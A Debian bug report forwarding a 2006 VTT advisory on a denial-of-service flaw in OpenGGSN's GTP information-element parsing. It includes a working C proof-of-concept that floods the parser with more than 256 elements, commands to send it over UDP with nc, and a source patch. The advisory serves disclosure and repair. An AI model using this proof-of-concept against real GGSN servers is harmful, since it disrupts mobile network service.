Package: openggsn Severity: important Tags: security patch etch This was sent to [EMAIL PROTECTED] in 2006:
OpenGGSN Denial of Service Vulnerability TNT project: http://www.vtt.fi/proj/tnt/index.jsp?lang=en Copyright © 2006 VTT Abstract OpenGGSN is an open source implementation of a Gateway GPRS Support Node (GGSN). It is used by mobile operators as an interface between the Internet and the rest of the mobile network infrastructure. A Denial of Service (DoS) vulnerability -- caused by an infinite loop in GTPIE parsing when a UDP packet with more than GTPIE_SIZE (256) elements is received -- was found with the Codenomicon GTP test suite. A fix developed by VTT is provided with this advisory. ------------------------------------------------------------------------------- Table of Contents Background GTP OpenGGSN Codenomicon GTP Test Suite Affected Products Details Exploiting The Vulnerability Fix About VTT Background GTP http://en.wikipedia.org/wiki/GPRS_Tunnelling_Protocol GPRS Tunnelling Protocol (or GTP) is an IP based protocol used within GSM and UMTS networks. The GTP protocol is layered on top of UDP. There are in fact three separate protocols, GTP-C, GTP-U and GTP'. GTP-C is used within the GPRS core network for signalling between GPRS Support Nodes (GGSNs and SGSNs). This allows the SGSN to activate a session on the users behalf (PDP context activation), to deactivate the same session, to adjust quality of service parameters or to update a session for a subscriber who has just arrived from another SGSN. GTP-U is used for carrying user data within the GPRS core network and between the Radio Access Network and the core network. The user data transported can be packets in any of IPv4, IPv6 or PPP formats. OpenGGSN http://www.openggsn.org OpenGGSN is an open source implementation of a Gateway GPRS Support Node (GGSN). It is used by mobile operators as the interface between the Internet and the rest of the mobile network infrastructure. Codenomicon GTP Test Suite http://www.codenomicon.com/products/telecommunications/gtp/ Codenomicon GTP Test Tools help proactively eliminate security flaws in GTP implementations. The test tool converts your test workstation into a GPRS Support Node for testing the robustness of GPRS Tunneling Protocol (GTP) implementations. The test tools test GTP implementations for development flaws using the unique Codenomicon fault injection technology. Affected Products * OpenGGSN versions 0.83 and 0.84 Details VTT's TNT project (http://www.vtt.fi/proj/tnt/index.jsp?lang=en) used Codenomicon GTP test suite to test an OpenGGSN installation based on Debian unstable/sid distribution. One of the findings is that running any testcase containing a message with more than 256 information elements in the payload caused the OpenGGSN to go into a infinite loop and thus causing an Denial of Service condition and unnecessary consumption of CPU resources. Exploiting The Vulnerability The attacker can make a Denial of Service attack simply by sending a UDP message containing more than 256 information elements to the OpenGGSN server. /* * OpenGGSN - Gateway GPRS Support Node * Copyright (C) 2002, 2003, 2004 Mondru AB. * * The contents of this file may be used under the terms of the GNU * General Public License Version 2, provided that the above copyright * notice and this permission notice is included in all copies or * substantial portions of the software. * * Copyright (C) 2006 VTT */ /* * Proof of concept for OpenGGSN GTPIE parsing Denial-of-Service condition. * * compile in openggsn-0.84/gtp directory: * cc -Wall -g -O0 -L.libs -lgtp gtpie_dos.c -o gtpie_dos * run OpenGGSN: * ./ggsn --fg --debug -c ../examples/ggsn.conf -l 127.0.0.1 * run PoC: * ./gtpie_dos | nc -q 0 -u 127.0.0.1 3386 * resulting DoS: * PID USER PR NI VIRT RES SHR S %CPU %MEM TIME+ COMMAND * 29972 root 25 0 133m 3488 1412 R 98.5 0.3 0:05.23 lt-ggsn * UDP payload: * ./gtpie_dos | hexdump -x * 0000000 101e 0202 0100 0000 ffff ffff beef dead * 0000010 0000 0000 0101 0101 0101 0101 0101 0101 * 0000020 0101 0101 0101 0101 0101 0101 0101 0101 * * 0000210 0101 0101 0101 * 0000216 */ #include <stdio.h> #include <sys/types.h> #include <netinet/in.h> #include <string.h> #include <stdlib.h> #include <unistd.h> #include "pdp.h" #include "gtp.h" #include "gtpie.h" int main(void) { int i; struct gtp0_packet *packet=calloc(1, sizeof(struct gtp0_packet)); /* header*/ struct gtp0_header *gtp0 = (struct gtp0_header*) packet; /* Initialise "standard" GTP0 header */ gtp0->flags=0x1e; gtp0->type=hton8(GTP_CREATE_PDP_REQ); gtp0->spare1=0xff; gtp0->spare2=0xff; gtp0->spare3=0xff; gtp0->number=0xff; gtp0->seq=hton16(0x1); gtp0->flow=0; gtp0->tid=0xdeadbeef; int length = GTP0_HEADER_SIZE; /* data */ uint8_t qr=0x1; for (i=0; i<=GTPIE_SIZE; i++) { gtpie_tv0(packet, &length, GTP_MAX, GTPIE_CAUSE, sizeof(qr), &qr); } gtp0->length = hton16(length - GTP0_HEADER_SIZE); write(STDOUT_FILENO, (void *) packet, (size_t) length); return 0; } Fix The problem lies in the parsing of information elements in GTP messages, which is implemented in the gtpie_decaps function of gtp/gtpie.c file. The implementation has a bug that does not check if there are too many information elements in the message thus causing the software to loop infinitely in the while-loop. In addition, handling routine for the error situation had to be implemented outside the while-loop. --- openggsn-0.84.orig/gtp/gtpie.c +++ openggsn-0.84/gtp/gtpie.c @@ -188,7 +188,7 @@ memset(ie, 0, 4 * GTPIE_SIZE); - while (p<end) { + while ((p<end) && (j<GTPIE_SIZE)) { if (GTPIE_DEBUG) { printf("The packet looks like this:\n"); for( i=0; i<(end-p); i++) { @@ -346,6 +346,10 @@ (unsigned long) p, (unsigned long) end); return 0; /* We landed at the end of the packet: OK */ } + else if (!(j<GTPIE_SIZE)) { + if (GTPIE_DEBUG) printf("GTPIE too many elements.\n"); + return EOF; /* We received too many information elements */ + } else { if (GTPIE_DEBUG) printf("GTPIE exceeded end of packet. %lx %lx\n", (unsigned long) p, (unsigned long) end); About VTT http://www.vtt.fi/?lang=en VTT is an impartial expert organisation. Its objective is to develop new technologies, create new innovations and value added thus increasing customer's competencies. With its know how VTT produces research, development, testing and information services to public sector and companies as well as international organisations.
